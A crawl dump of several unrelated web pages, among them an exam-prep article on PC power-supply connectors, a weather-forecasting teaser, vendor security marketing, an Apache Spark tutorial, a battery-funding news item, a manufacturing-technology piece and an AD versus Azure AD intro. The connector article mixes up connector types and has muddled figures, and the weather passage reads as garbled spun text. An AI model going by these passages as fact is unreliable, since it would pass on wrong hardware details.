- Run source code tests—software composition analysis (SCA) and static application security testing (SAST) tools have evolved to support DevOps and automation. They are integral to container security, helping you track open source software, license restrictions, and code vulnerabilities. | <urn:uuid:26f33ab5-eb6e-433d-ab8b-bdafc233ec71> | CC-MAIN-2024-38 | https://www.aquasec.com/cloud-native-academy/docker-container/what-is-a-container/ | 2024-09-11T04:20:32Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651343.80/warc/CC-MAIN-20240911020451-20240911050451-00792.warc.gz | en | 0.887911 | 3,010 | 3.15625 | 3 |
The power supply is like the life blood of the computer and without it, the computer cannot even function no matter how good software and hardware are installed there. If one unplugs the computer from the power supply and open up the CPU case, he can have a look there on a large box which would be of the power supply. The box looks large and there would be some thick wires coming out of it or getting connected to it. The power connection contains some large amount of the power supply so when someone is about to install or reinstall some hardware, it is advised to them to first unplug their power supply since the flow of the charge can cause some serious shock damages as well. There are some power supply options and some methods about how they can be installed in the computer;
One should know that the connectors which are connected to the motherboard are of different sizes and types. When one opens up the CPU, One would find many types of wires coming out of the box and many connectors would be there as well. Each of these connectors that one would see, are connected to the other parts to the system in some ways. Also, they would also be connected to the motherboard itself as well to ensure that video cards, motherboards and all the other devices which are insight the computer get the appropriate power supply. Following are the connector's types that one can find in a computer;
SATA: The storage devices that one can find in the computers also need some power supply. The power supply connection that is made to it isn't an ordinary one, like it cannot have the 4-Pin connector. There is the SATA power connection which can be used to empower the SATA drive. This connection can give power to the latest SATA drives and the ones which came out in the transition period of SATA. The standard power connection for the SATA can be seen at the far left side of the drive. But, if one has only the Molex connector, then it might allow one to use that connector as well. The latest SATA does not drive nor normally have the SATA connection which is only one. That connector is very specific and the SATA drive is the only device which can use this type of connection.
Molex: It is the most found connection type in a computer. It is the simplest connector and has the 4 Pin Power. The name has been given to this connection due to the manufacturer who builds this connector. The Molex is actually a very large organization and it has created many connectors but the connections which can be found in the computers now have moniker of this Molex connector.
4/8-Pin 12v: The 4 Pin connection is also known as the Molex connection. It is one of the most common types of connector that is being used in the computer. The connector has some shapes, like it is actually slanted form one side so that it can be fit into the power connection which has the exact size. Normally, these power types are used for empowering the peripherals that are inside the computers, like CD ROM. Many of the fans also get connected to this specific connector. One can find this connector at many places in a system since it is very common now. Here, also one can find the 8 Pins connector. This is called the EPs12 volt. This power supply is the entry level and it has been designed specifically for the servers and those devices which have some multiple purposes. Also, if a processor has multiple cores which needs lots of power, then this connector is used there as well. Since there are 8 pins connected with it, the power flow is great. One might also find them on the motherboard with the injunction of the 24 Pins connector.
PCIe 6/8-Pin: The motherboard isn't the only part of the computer which demands the great amount of power. The PCIe sometimes have more connections on it, so that it requires more power as well. Also, there are some 6 Pins and 8 Pins power connectors which are specifically designed for the PCIe and they directly get connected to the connectors on it. Hence the great amount of power can flow through PCIe. The 6Pin connector actually has power of 75 watt and the 8 pin connector contains the power of 150 watt. The reason why PCIe needs too much energy is that it has the video cards and if the video card is the powerful one, it would require a lot of energy. Also, there are many processors which are connected to the card and some fans are connected there as well which help cooling up the heat generated by the card. If one takes a look at the top of a video card, he would find the connectors there. Here one can connect more connectors if the PCIe card needs more energy. So, the card itself too has a connector as well and needs direct energy.
20-Pin: the 20 pin connector was used to be used in previous time when the standards weren't so high and the power wasn't needed that much to keep the system running. Now since the tables have turned, the more power is required and now the usage of 20 pins connector is less. Now one can find the 20 Pins connector along with some extra 4Pins connector so that more power can be supplied to the devices so that they can perform up to the mark.
24-Pin: Since the devices have evolved a lot, their power supply needs have increased dramatically as well. Now the 20 Pins connector can't be used and there are the 24 pins connectors which have replaced them. This connector is really large and is located on the motherboard. Since the size of this connector is pretty huge, so one can easily find this connector on the motherboard. Here, one can just simply insert the plug and the direct connection would be established between the power supply and the motherboard.
Floppy: The floppy drives are not used anymore. But if a computer has it, the connector type which is connected to it is somehow, very different. This unique connector is the 4 Pins connector and it is too small. Now, it is just call the floppy type connector and it is the generic name of it. It is sometimes also called as the berg connector. The reason why connector is so unique and small is that floppy drive requires some really small amount of power that's why the connector is only 4 pin. Due to its uniqueness, it's pretty easy to find out the right power connection and get it connected to the drive so that it can work properly.
When one starts checking out the power supplies which are there in the computer, there are many terms that would be faced by the person and he might even not know what they mean. The common example of it is, A. A stands for the Ampere and it is the unit of electricity which indicates that how many electrons can pass through the specific point in the given time. Ampere is denoted with word A. Here are some specifications which should be learned by one;
Wattage: There is an important term that one should know about. It is called 'watt'. It is actually the calculations of the fact that how many volt times amps come up to the total watts number. This power is the one that is used at all the particle places at any time. So, if one basically takes the total number of volts and the ampere which means how many electrons are being passed by and multiply them both, then the watts would be gained. So, the 60w power would be equal to the 120V and the 0.5 ampere electricity. One can find it written on many of the places of the power supply. The label for the power supply also mentions many of the volts and the amps which come from the various points. Also, it indicates that total power of 2000 watts is allowed to be flown into the computer at a specific time.
Size: The sizes of the connection have the great impact since many of the connectors vary in the size. There are several sizes available for a single connector so if one is going to get them connected, he should ensure that the either sized connector is being connected to the connection so that the right type of connection can be established and electricity can flow through it easily. The smaller motherboards would contain the small connections and hence the smaller connectors would be required for them. Number of Connectors: Another important thing that matters the most if the number of connectors which are available at a device. But since the power supply might vary, so one must chose the connectors very carefully so that the power demand is fulfilled and the device which is connected can work properly.
ATX: ATX is the type of a power supply. It is so standard and the shape and the size of it so standardized that one can easily find the ATX and can get it connected to where it was connected before. The standardization of the size and the shape allows the ATX connections to accept any ATX connector no mater whether it is new or not, it would surely be compatible. The power supply that one uses can have many various types of connectors and this connector allows the much hardware to get the power directly into them. Hence, when one buys the power supply, he should ensure that the size is same and there's the compatibility between and current and new connector. The power supply isn't so rigid; there are some pretty modular ones as well. ATZ is one of them. There are come connections which can be found on the back so that the standardized connections can be made and it depends on what is needed to have on the other side of the connector. Also, doing so can enable the user to minimize the cables which he has in the computer. Also, one can add or remove the vales and the type of the connector that one needs pretty easily.
Micro ATX: As it is known, the motherboards have the various sizes. So, if a motherboard is small, it is obvious that the size would be small as well. So, there is the need of micro ATX which has small size and can get connected to the motherboard quite easily. So, one should be cautious even with the ATX connectors since the sizes can vary easily.
This option actually means that the unit which contains this feature can operate on one of the two available power voltages. Many countries have the different voltages. Due to this feature, the manufacturers can market their products in the other country as well since the voltage can be adjusted by the dual voltage options. Hence, the user can select a specific voltage options and it can be done with the help of the small switch. Since the PC's power cord is tightened to the back of the case, some of them have a small switch here and the voltage is mentioned there like 115V or 220v. Here one can find the dual voltage option and can change the option himself.
After this all, one can get himself familiarised with the power connection types and can configure them himself. Also, he can try to unplug the computer, open it up and check the power supply connection and this can increase the knowledge level of a person. Also, one should know about the sizes and the number of the connector. Reason being is that if the size is different than the connector might not get connected at all or can get connected loose and hence the power supply won't be flown easily throughout the circuit. Also, one should check the documentations and know that what kind of the voltage the power supply should be having and can ensure that it is getting the same amount of power that it wants. Also, ensuring that all things are in the right place can help the computer getting powered on safely and successfully.
SPECIAL OFFER: GET 10% OFF
Pass your Exam with ExamCollection's PREMIUM files!
SPECIAL OFFER: GET 10% OFF
Use Discount Code:
A confirmation link was sent to your e-mail.
Please check your mailbox for a message from email@example.com and follow the directions.
Download Free Demo of VCE Exam Simulator
Experience Avanset VCE Exam Simulator for yourself.
Simply submit your e-mail address below to get started with our interactive software demo of your free trial. | <urn:uuid:7be774da-cba0-42f9-8f47-6035d1af3463> | CC-MAIN-2024-38 | https://www.examcollection.com/certification-training/a-plus-computer-power-specifications-connector-types.html | 2024-09-13T14:55:11Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651523.40/warc/CC-MAIN-20240913133933-20240913163933-00592.warc.gz | en | 0.973331 | 2,474 | 3.0625 | 3 |
Weather Forecasting serves many purposes and desires. It can help people and agencies to devise for the future and to make rational decisions. Meteorologists' fundamental intention is to understand the atmospheric strategies after expecting the future weather as plenty in advance as viable.
Adaptation to the climatic surroundings means that adjusting to the regular occurrences and withstanding the adverse extremes is an essential feature for the survival of lifestyles. So, it's miles inevitable to move for the weather forecast in the global anywhere.
#### The goal of atmospheric studies
Weather prediction is stated to be the final goal of atmospheric research. It is the most superior location in the challenge and application of meteorology. To make a correct forecast, a meteorologist should first apprehend what strategies are occurring within the surroundings to produce the modern-day climate where the meteorologist is forecasting. This is completed by measuring certain factors (making observations) of the atmosphere.
To continue reading "Weather Prediction / Forecast", login now.
This page has been protected for subscriber only. | <urn:uuid:9a66cc48-817c-42f0-a234-7cb1842e8fe1> | CC-MAIN-2024-38 | https://hub.batoi.com/epress/post/weather-prediction--forecast-60802f3461c78 | 2024-09-21T00:35:51Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701425385.95/warc/CC-MAIN-20240920222945-20240921012945-00892.warc.gz | en | 0.943267 | 205 | 2.890625 | 3 |
Computer Security and Cyber Security: What You Need To Know
In today’s digital age, understanding the difference between computer security and cyber security is essential for protecting your business. With the rise in cyber threats and the increasing reliance on technology, ensuring your company’s data and systems are secure is more important than ever. Here’s what you need to know.
The Difference Between Computer Security and Cyber Security
Computer Security refers to measures taken to protect the physical components and the software of a standalone computer system. This includes keeping computers, laptops, and other devices updated and properly patched to safeguard against unauthorized access and potential threats. Computer security ensures that the hardware and software of individual devices are protected from breaches and attacks.
Cyber Security, on the other hand, encompasses a broader scope. It involves protecting your company’s entire digital footprint, including networks, systems, and data, from unauthorized access, cyberattacks, and other online threats. Cyber security focuses on defending against various forms of cyber threats such as ransomware, malware, phishing, and more. It ensures the confidentiality, integrity, and availability of your digital information across all connected devices and systems.
Why You Need Computer and Cyber Security
Both computer security and cyber security are crucial for any modern business. Cyberattacks can result in significant financial loss, data breaches, and damage to your company’s reputation. Ensuring robust cyber security measures are in place helps protect against these threats. Many industries have strict data protection regulations that businesses must comply with, and failure to do so can result in hefty fines and legal issues. Proper security measures ensure compliance and avoid regulatory penalties. Data breaches and cyberattacks can disrupt business operations, leading to downtime and loss of productivity. Effective security measures help maintain business continuity by preventing and mitigating the impact of such incidents. Clients and customers trust that their data is secure with your business, and strong security measures protect customer data, enhancing trust and loyalty.
How Cyber Security and Computer Security Affect Your Business
Cyber threats can have devastating effects on businesses, regardless of size. Small businesses are often targeted because they may lack the resources to implement robust security measures. A single successful cyberattack can lead to data loss, financial damage, and a tarnished reputation. Additionally, recovery from such incidents can be costly and time-consuming, further impacting business operations.
At Atruent, we understand the unique security challenges businesses face. Our comprehensive security solutions are designed to protect your business from both computer and cyber threats. Atruent provides continuous monitoring and management of your systems to detect and respond to threats in real-time, minimizing the risk of breaches. We tailor our security solutions to meet the specific needs of your business, ensuring that all potential vulnerabilities are addressed. Atruent helps businesses comply with industry regulations by implementing the necessary security protocols and providing ongoing support to maintain compliance. Our disaster recovery services ensure that your data is backed up and can be quickly restored in the event of an incident, minimizing downtime and ensuring business continuity. Our team of seasoned security professionals is always available to provide support and guidance, ensuring your business remains secure against evolving threats.
By partnering with Atruent, you can rest assured that your business is protected from the myriad of cyber threats present in today’s digital landscape. Our expert team is dedicated to providing top-notch security solutions that keep your data safe and your business running smoothly. | <urn:uuid:a9e5bac0-aa00-4f11-99b0-f1002096f023> | CC-MAIN-2024-38 | https://www.atruent.com/computer-security-and-cyber-security-what-you-need-to-know/ | 2024-09-07T16:32:26Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00292.warc.gz | en | 0.942989 | 691 | 2.796875 | 3 |
What is Spark? Let’s take a look under the hood
In my previous post, we introduced a problem: copious, never ending streams of data, and it’s solution: Apache Spark. Here in Part II, we’ll focus on Spark’s internal architecture and data structures.
In pioneer days they used oxen for heavy pulling, and when one ox couldn’t budge a log, they didn’t try to grow a larger ox. We shouldn’t be trying for bigger computers, but for more systems of computers — Grace Hopper
With the scale of data growing at a rapid and ominous pace, we needed a way to process potential petabytes of data quickly, and we simply couldn’t make a single computer process that amount of data at a reasonable pace. This problem is solved by creating a cluster of machines to perform the work for you, but how do those machines work together to solve the common problem?
Spark is the cluster computing framework for large-scale data processing. Spark offers a set of libraries in 3 languages (Java, Scala, Python) for its unified computing engine. What does this definition actually mean?
: With Spark, there is no need to piece together an application out of multiple APIs or systems. Spark provides you with enough built-in APIs to get the job done
Spark handles loading data from various file systems and runs computations on it, but does not store any data itself permanently. Spark operates entirely in memory — allowing unparalleled performance and speed
Spark is comprised of a series of libraries built for data science tasks. Spark includes libraries for SQL (SparkSQL), Machine Learning (MLlib), Stream Processing (Spark Streaming and Structured Streaming), and Graph Analytics (GraphX)
The Spark Application
Every Spark Application consists of a Driver and a set of distributed worker processes (Executors).
The Driver runs the main() method of our application and is where the SparkContext is created. The Spark Driver has the following duties:
- Runs on a node in our cluster, or on a client, and schedules the job execution with a cluster manager
- Responds to user’s program or input
- Analyzes, schedules, and distributes work across the exectors
- Stores metadata about the running application and conveniently exposes it in a webUI
An executor is a distributed process responsible for the execution of tasks. Each Spark Application has its own set of executors, which stay alive for the life cycle of a single Spark application.
- Executors perform all data processing of a Spark job
- Stores results in memory, only persisting to disk when specifically instructed by the driver program
- Returns results to the driver once they have been completed
- Each node can have anywhere from 1 executor per node to 1 executor per core
Spark’s Application Workflow
When you submit a job to Spark for processing, there is a lot that goes on behind the scenes.
- Our Standalone Application is kicked off, and initializes its SparkContext. Only after having a SparkContext can an app be referred to as a Driver
- Our Driver program asks the Cluster Manager for resources to launch its executors
- The Cluster Manager launches the executors
- Our Driver runs our actual Spark code
- Executors run tasks and send their results back to the driver
- SparkContext is stopped and all executors are shut down, returning resources back to the cluster
Lets take a deeper look at the Spark Job we wrote in Part I to find max temperature by country. This abstraction hid a lot of set-up code, including the initialization of our SparkContext, lets fill in the gaps:
MaxTemperature Spark Setup
Remember that Spark is a framework, in this case, implemented in Java. It isn’t until line 16 that Spark needs to do any work at all. Sure, we initialized our SparkContext, however, loading data into an RDD is the first bit of code that requires work be sent to our executors.
By now you may have seen the term “RDD” appear multiple times, it’s about time we define it.
Spark Architecture Overview
Spark has a well-defined layered architecture with loosely coupled components based on two primary abstractions:
- Resilient Distributed Datasets (RDDs)
- Directed Acyclic Graph (DAG)
Resilient Distributed Datasets
RDDs are essentially the building blocks of Spark: everything is comprised of them. Even Sparks higher-level APIs (DataFrames, Datasets) are composed of RDDs under the hood. What does it mean to be a Resilient Distributed Dataset?
Since Spark runs on a cluster of machines, data-loss from hardware failure is a very real concern, so RDDs are fault tolerant and can rebuild themselves in the event of failureDistributed:
A single RDD is stored on a series of different nodes in the cluster, belonging to no single source (and no single point of failure). This way our cluster can operate on our RDD in parallelDataset:
A collection of values — this one you should probably have known already
All data we work within Spark will be stored inside some form of RDD — it is, therefore, imperative to fully understand them.
Spark offers a slew of “Higher Level” APIs built on top of RDDs designed to abstract away complexity, namely the DataFrame and Dataset. With a strong focus on Read-Evaluate-Print-Loops (REPLs), Spark-Submit and the Spark-Shell in Scala and Python are targeted toward Data Scientists, who often desire repeat analysis on a dataset. The RDD is still imperative to understand, as it’s the underlying structure of all data in Spark.
An RDD is colloquially equivalent to: “Distributed Data Structure”. A JavaRDD<String>
is essentially just a List<String>
dispersed amongst each node in our cluster, with each node getting several different chunks of our List. With Spark, we need to think in a distributed context, always.
RDDs work by splitting up their data into a series of partitions to be stored on each executor node. Each node will then perform its work only on its own partitions. This is what makes Spark so powerful: If an executor dies or a task fails Spark can rebuild just the partitions it needs from the original source and re-submit the task for completion.
Spark RDD partitioned amongst executors
RDDs are Immutable
, meaning that once they are created, they cannot be altered in any way, they can only be transformed
. The notion of transforming RDDs is at the core of Spark, and Spark Jobs can be thought of as nothing more than any combination of these steps:
- Loading data into an RDD
an RDD- Performing an
on an RDD
In fact, every Spark job I’ve written is comprised of exclusively those types of tasks, with vanilla Java for flavour.
Spark defines a set of APIs for working with RDDs that can be broken down into two large groups: Transformations and Actions.
Transformations create a new RDD from an existing one.
Actions return a value, or values, to the Driver program after running a computation on its RDD.
For example, the map function weatherData.map() is a transformation that passes each element of an RDD through a function.
Reduce is an RDD action that aggregates all the elements of an RDD using some function and returns the final result to the driver program.
“I choose a lazy person to do a hard job. Because a lazy person will find an easy way to do it. — Bill Gates”
All transformations in Spark are lazy
. This means that when we tell Spark to create an RDD via transformations of an existing RDD, it won’t generate that dataset until a specific action is performed on it or one of its children. Spark will then perform the transformation and the action that triggered it. This allows Spark to run much more efficiently.
Let’s re-examine the function declarations from our earlier Spark example to identify which functions are actions and which are transformations:
16: JavaRDD<String> weatherData = sc.textFile(inputPath);
Line 16 is neither an action or a transformation; it’s a function of sc, our JavaSparkContext.
17: JavaPairRDD<String, Integer> tempsByCountry = weatherData.mapToPair(new Func.....
Line 17 is a transformation of the weatherData RDD, in it we map each line of weatherData to a pair comprised of (City, Temperature)
26: JavaPairRDD<String, Integer> maxTempByCountry = tempsByCountry.reduce(new Func....
Line 26 is also a transformation because we are iterating over key-value pairs. its a transformation of tempsByCountry in which we reduce each city to its highest recorded temperature.
Finally, on line 31 we trigger a Spark action: saving our RDD to our file system. Since Spark subscribes to the lazy execution model, it isn’t until this line that Spark generates weather data, tempsByCountry, and maxTempsByCountry before finally saving our result.
Directed Acyclic Graph
Whenever an action is performed on an RDD, Spark creates a DAG, a finite direct graph with no directed cycles (otherwise our job would run forever). Remember that a graph is nothing more than a series of connected vertices and edges, and this graph is no different. Each vertex in the DAG is a Spark function, some operation performed on an RDD (map, mapToPair, reduceByKey, etc).
In MapReduce, the DAG consists of two vertices: Map → Reduce
In our above example of MaxTemperatureByCountry, the DAG is a little more involved:
parallelize → map → mapToPair → reduce → saveAsHadoopFile
The DAG allows Spark to optimize its execution plan and minimize shuffling. We’ll discuss the DAG in greater depth in later posts, as it’s outside the scope of this Spark overview.
With our new vocabulary, let us re-examine the problem with MapReduce as I defined in Part I, quoted below:
MapReduce excels at batch data processing, however it lags behind when it comes to repeat analysis and small feedback loops. The only way to reuse data between computations is to write it to an external storage system (a la HDFS)”
‘Re-use data between computations’? Sounds like an RDD that can have multiple actions performed on it! Let's suppose we have a file “data.txt” and want to accomplish two computations:
- Total length of all lines in the file
- Length of the longest line in the file
In MapReduce, each task would require a separate job or a fancy MulitpleOutputFormat implementation. Spark makes this a breeze in just four simple steps:
- Load contents of data.txt into an RDD
JavaRDD<String> lines = sc.textFile("data.txt");
2. Map each line of ‘lines’ to its length (Lambda functions used for brevity)
JavaRDD<Integer> lineLengths = lines.map(s -> s.length());
3. To solve for total length: reduce lineLengths to find the total line length sum, in this case, the sum of every element in the RDD
int totalLength = lineLengths.reduce((a, b) -> a + b);
4. To solve for longest length: reduce lineLengths to find the maximum line length
int maxLength = lineLengths.reduce((a, b) -> Math.max(a,b));
Note that steps 3 and 4 are RDD actions, so they return a result to our Driver program, in this case, a Java int. Also recall that Spark is lazy and refuses to do any work until it sees an action, in this case, it will not begin any real work until step 3.
So far we’ve introduced our data problem and its solution: Apache Spark. We reviewed Spark’s architecture and workflow, it’s flagship internal abstraction (RDD), and its execution model. Next, we’ll look into Functions and Syntax in Java, getting progressively more technical as we dive deeper into the framework. | <urn:uuid:d83ce0c7-824c-4317-80c5-c44de347a9ed> | CC-MAIN-2024-38 | https://resources.experfy.com/bigdata-cloud/high-level-overview-of-apache-spark/ | 2024-09-08T22:27:43Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651035.2/warc/CC-MAIN-20240908213138-20240909003138-00192.warc.gz | en | 0.91021 | 2,677 | 3.1875 | 3 |
The US government’s Department of Energy (DOE) is set to pump $100 million into projects looking at non-lithium batteries for long-term energy storage.
It has issued a notice of intent offering to fund pilot-scale energy storage demonstration projects that focus on “non-lithium technologies, long-duration (10+ hour discharge) systems, and stationary storage applications.”
Such systems could form an important part of the transition to renewable energy for data center operators and grid providers, allowing them to capture and store solar or wind power at times of high supply so that it can be used when resources are scarce. They could also underpin backup power systems by storing renewable energy for use in emergencies.
The DOE expects the US will need an additional 700-900GW if the nation is to reach its 2050 net zero target. “Short duration energy storage is already supporting the grid, but continued deployment of variable renewable energy may push the requirement beyond the energy storage systems that exist today,” a statement from the department said.
“To support a growing reliance on variable renewable energy, LDES systems will play a key role in offering dispatchable backup power that can be deployed when needed to ensure grid resilience.”
The DOE is providing the funding through its Office of Clean Energy Demonstrations (OCED). It is aiming to support three to 15 projects with grants of $5-$20 million which will need to be matched with private investment. The OCED funding will “support technology maturation activities including design for manufacturability, pilot system development, fabrication and installation, operational testing and validation, and commercial scale system design and supply chain growth.”
Projects will require applicants to have a team that includes a technology provider and “encourage [the] inclusion of utilities, facility owner/operators, developers, financiers, and others that support a clear path to commercial adoption.”
Battery researchers around the world are looking at alternatives to lithium-based batteries. In June, DCD reported on a project by academics at the UK’s University of Southampton which claims to have developed a battery with a water-based electrolyte suitable for large-scale storage.
US startup Unigrid recently raised $12 million to help it develop its storage battery, which is based on a novel sodium-ion chemistry. | <urn:uuid:2493917f-fd9e-4f70-ae5b-47dd00aed8e8> | CC-MAIN-2024-38 | https://www.datacenterdynamics.com/en/news/us-department-of-energy-to-pump-100m-into-non-lithium-battery-storage-projects/ | 2024-09-08T23:55:27Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651035.2/warc/CC-MAIN-20240908213138-20240909003138-00192.warc.gz | en | 0.946348 | 486 | 2.59375 | 3 |
The advent of artificial intelligence (AI), robotics, and the Internet of Things (IoT) is fundamentally revolutionizing the manufacturing sector. Innovations in these fields have enabled manufacturers to significantly enhance productivity, cost-efficiency, and product quality. This article explores how these technological advancements are shaping the modern manufacturing landscape.
Robotics and Automation
The integration of robotics and automation into manufacturing processes represents a transformative leap forward, fundamentally altering how goods are produced. Collaborative robots, or ‘cobots,’ are becoming increasingly prevalent across a variety of manufacturing operations. Cobots are specifically designed to work alongside human employees, performing tasks such as welding, assembly, and product inspection. These robots not only boost productivity but also play a crucial role in improving workplace safety by significantly reducing the incidence of injuries related to repetitive or hazardous tasks.
In addition to these advantages, cobots are evolving to become more cost-effective and adaptable. This financial accessibility makes them an attractive option for Small and Medium Enterprises (SMEs), democratizing automation technology and enabling smaller manufacturers to benefit from increased efficiency and reduced operational costs. The implementation of these robots allows companies to optimize their production lines, leading to more consistent product quality and less variability, further driving operational success and competitiveness in a crowded market.
Artificial Intelligence (AI)
The role of AI in modern manufacturing is both multifaceted and profound, impacting many layers of the production process. One of the key applications of AI is in predictive maintenance. AI systems possess the capability to analyze vast amounts of operational data to forecast when machinery will likely require maintenance. By predicting these needs ahead of time, manufacturers can significantly reduce downtime and extend the lifespan of their equipment. This predictive capability not only enhances overall productivity but also ensures the smooth and continuous operation of manufacturing lines, minimizing unexpected breakdowns.
Another crucial application of AI is in quality control. By leveraging machine learning and image recognition technologies, AI-driven quality control systems can detect defects with remarkable precision and speed. These systems reduce waste by identifying imperfections early in the production process, ensuring that only high-quality items reach the market. This enhancement in quality control elevates customer satisfaction, strengthens brand reputation, and ultimately leads to better sales performance. AI’s integration into quality monitoring also enables faster response times to manufacturing issues, allowing for quick adjustments and continuous improvement.
The Internet of Things (IoT)
Creating Smart Factories
The Internet of Things (IoT) is instrumental in developing smart factories, where interconnected devices communicate in real-time to optimize manufacturing processes. By embedding sensors into machinery and gathering data continuously, manufacturers gain invaluable insights into machine performance and potential issues. This real-time data exchange enables quicker, more informed decision-making that enhances operational efficiency and significantly reduces downtime, thus maintaining a more productive manufacturing environment.
In addition to optimizing internal processes, IoT solutions are revolutionizing supply chain management. By enabling real-time tracking of goods, manufacturers can better manage inventory levels, reduce carrying costs, and improve the speed and reliability of deliveries. These capabilities are crucial in an era where responsiveness and agility are key competitive differentiators. The enhanced visibility offered by IoT allows supply chains to be more adaptable and resilient, ensuring steady and predictable production lines that can meet market demands more effectively.
Enhancing Supply Chain Efficiency
The digitization of supply chains through IoT technologies enhances their resilience and adaptability. By leveraging real-time data, manufacturers can anticipate and respond to potential disruptions more effectively, ensuring a more stable supply chain. This proactive approach helps to mitigate risks from external challenges, such as geopolitical tensions, natural disasters, or sudden market shifts, thus maintaining consistent production levels and minimizing the impact on overall operations.
Furthermore, IoT-enabled supply chains foster improved resource management. Automated systems can dynamically adjust production schedules and material orders based on real-time demand and inventory levels. This capability streamlines operations and reduces waste and costs associated with overproduction or excess inventory. The efficient management of resources ensures that manufacturers can meet demand without holding costly surplus stock, leading to more sustainable and cost-effective production practices that align with modern environmental and economic goals.
Key Industry Trends
Addressing Skilled Labor Shortage
A persistent challenge in the manufacturing sector is the shortage of skilled labor. The integration of AI, robotics, and IoT serves as a strategic response to this issue by automating routine and labor-intensive tasks. This automation allows manufacturers to free up their human workforce for more complex and value-added activities, mitigating the impact of labor shortages and enhancing overall workplace productivity. It also empowers existing employees to focus on tasks that require human ingenuity and problem-solving abilities.
Moreover, the adoption of smart factory solutions attracts a new generation of tech-savvy workers who are drawn to innovative and technologically advanced environments. By presenting themselves as cutting-edge employers, manufacturing companies can better compete in the labor market, positioning themselves as desirable workplaces for young professionals interested in technology and innovation. This shift not only addresses the immediate labor shortage but also builds a more capable and future-ready workforce that can drive the industry forward.
Enhancing Customer Service and Market Differentiation
In an increasingly competitive market, superior customer service and differentiated offerings are crucial for maintaining a competitive edge. Leveraging AI and IoT technologies enables manufacturers to deliver personalized and responsive customer experiences. Real-time data gathered from IoT devices allows manufacturers to respond quickly and accurately to customer inquiries, while AI-powered analytics provide insights into customer preferences and behaviors. These technologies facilitate more targeted marketing strategies and the development of products that better meet consumer needs.
Investing in superior aftermarket services, such as predictive maintenance suggestions and automatic replenishment systems, enhances customer satisfaction and creates new revenue streams. These value-added services not only differentiate manufacturers from their competitors but also build long-term customer loyalty by providing ongoing support and innovation. By continually meeting and exceeding customer expectations, manufacturers can secure their position in the market and foster lasting relationships with their clientele.
Influence of Recent Legislative Acts
Recent legislative acts, such as the Infrastructure Investment and Jobs Act (IIJA), the Creating Helpful Incentives to Produce Semiconductors (CHIPS) and Science Act, and the Inflation Reduction Act (IRA), have significantly impacted the manufacturing sector. These acts have driven up construction spending and stimulated demand, contributing to the sector’s growth despite challenges such as geopolitical tensions, labor shortages, and supply chain disruptions. The financial incentives and support provided by these legislative measures enable manufacturers to invest more confidently in advanced technologies.
This increased investment has accelerated the adoption of AI, robotics, and IoT, propelling the industry forward and setting a foundation for future growth. The legislative focus on technology and infrastructure creates a conducive environment for innovation, encouraging manufacturers to explore and integrate sophisticated solutions. This proactive approach not only enhances the resilience and competitiveness of the manufacturing sector but also prepares it to meet emerging global challenges and opportunities.
Proactive Adaptation and Strategic Investments
Companies like Steel Craft exemplify proactive adaptation to technological advancements. By integrating robotics and automation, particularly in laser-cutting and brake press operations, Steel Craft has successfully extended its lights-out manufacturing capabilities, operating with minimal human intervention. This strategic investment maximizes operational efficiencies, allowing the company to respond quickly to market demands while maintaining high levels of precision and quality.
The broader trend of incremental investment in technology highlights the importance of a balanced approach. Manufacturers must strategically manage workforce transitions, providing upskilling opportunities and integrating new technologies gradually. This ensures that human workers remain a critical component of the manufacturing process, supported by advanced tools that enhance their capabilities rather than replace them. Through the thoughtful integration of robotics, AI, and IoT, companies can achieve a harmonious blend of human and machine collaboration, ensuring sustainable growth and operational excellence.
The rise of artificial intelligence (AI), robotics, and the Internet of Things (IoT) is fundamentally transforming the manufacturing industry. These technological advancements are empowering manufacturers to achieve unprecedented levels of productivity, significantly boost cost-efficiency, and enhance the quality of their products. By leveraging AI, companies can optimize their production processes, anticipate maintenance needs, and reduce downtime. Robotics, on the other hand, automates repetitive tasks, increases precision, and decreases human error, leading to higher standards of product consistency and quality. The integration of IoT facilitates real-time monitoring and data collection, enabling manufacturers to make informed decisions quickly and efficiently. These technologies are not only streamlining operations but also fostering innovation, driving competitiveness, and setting new benchmarks in the manufacturing sector. This article delves into how AI, robotics, and IoT are reshaping the modern manufacturing landscape, highlighting the immense potential and challenges these advancements bring to the industry. | <urn:uuid:7909ca7b-239e-4f2d-a7db-7b77b85bc2e6> | CC-MAIN-2024-38 | https://manufacturingcurated.com/manufacturing-technology/how-are-ai-robotics-and-iot-transforming-modern-manufacturing/ | 2024-09-10T04:08:16Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00092.warc.gz | en | 0.924357 | 1,771 | 3.265625 | 3 |
AD vs Azure AD – confused about the difference? We get it – the distinction isn’t immediately clear.
Note: Microsoft renamed Azure AD to Entra ID in 2024
In this guide, we’ll be exploring the key differences between Active Directory (AD), Azure Active Directory (Azure AD) and their relevance to you.
What Is Active Directory?
AD stands for Active Directory. In order to understand what Active Directory is, you’ll need to understand the basics of a Domain Controller.
A Domain Controller is a server on the network that centrally manages access for users, PCs and servers on the network. It does this using AD.
Active Directory is a database that organises your company’s users and computers. It provides authentication and authorization to applications, file services, printers, and other resources on the network. It uses protocols such as Kerberos and NTLM for authentication and LDAP to query and modify items in the Active Directory databases.
Key Functions of AD
Active Directory Domain Services (to give it is full and proper name) run on the Domain Controller and have the following key functions:
- Secure Object store, including Users, Computers and Groups
- Object organization – Organisational Units (OU), Domains and Forests
- Common Authentication and Authorization provider
- LDAP, NTLM, Kerberos (secure authentication between domain joined devices)
- Group Policy – for fine grained control and management of PCs and Servers on the domain
So basically AD has a record of all your users, PCs and Servers and authenticates the users signing in (the network logon). Once signed in, AD also governs what the users are, and are not, allowed to do or access (authorisation). For example, it knows that John Smith is in the Sales Group and is not allowed to access the HR folder on the file server. It also allows control and management of PCs and Servers on the network via Group Policy (so for example you could set all users’ home page on their browser to be your intranet, or you can prevent users from installing other software etc).
Most established businesses will have AD running on one or more Domain Controllers on their network.
What are the Azure Active Directory benefits?
Azure AD Benefit 1
Azure AD is not simply a cloud version of AD as the name might suggest. Although it performs some of the same functions, it is quite different.
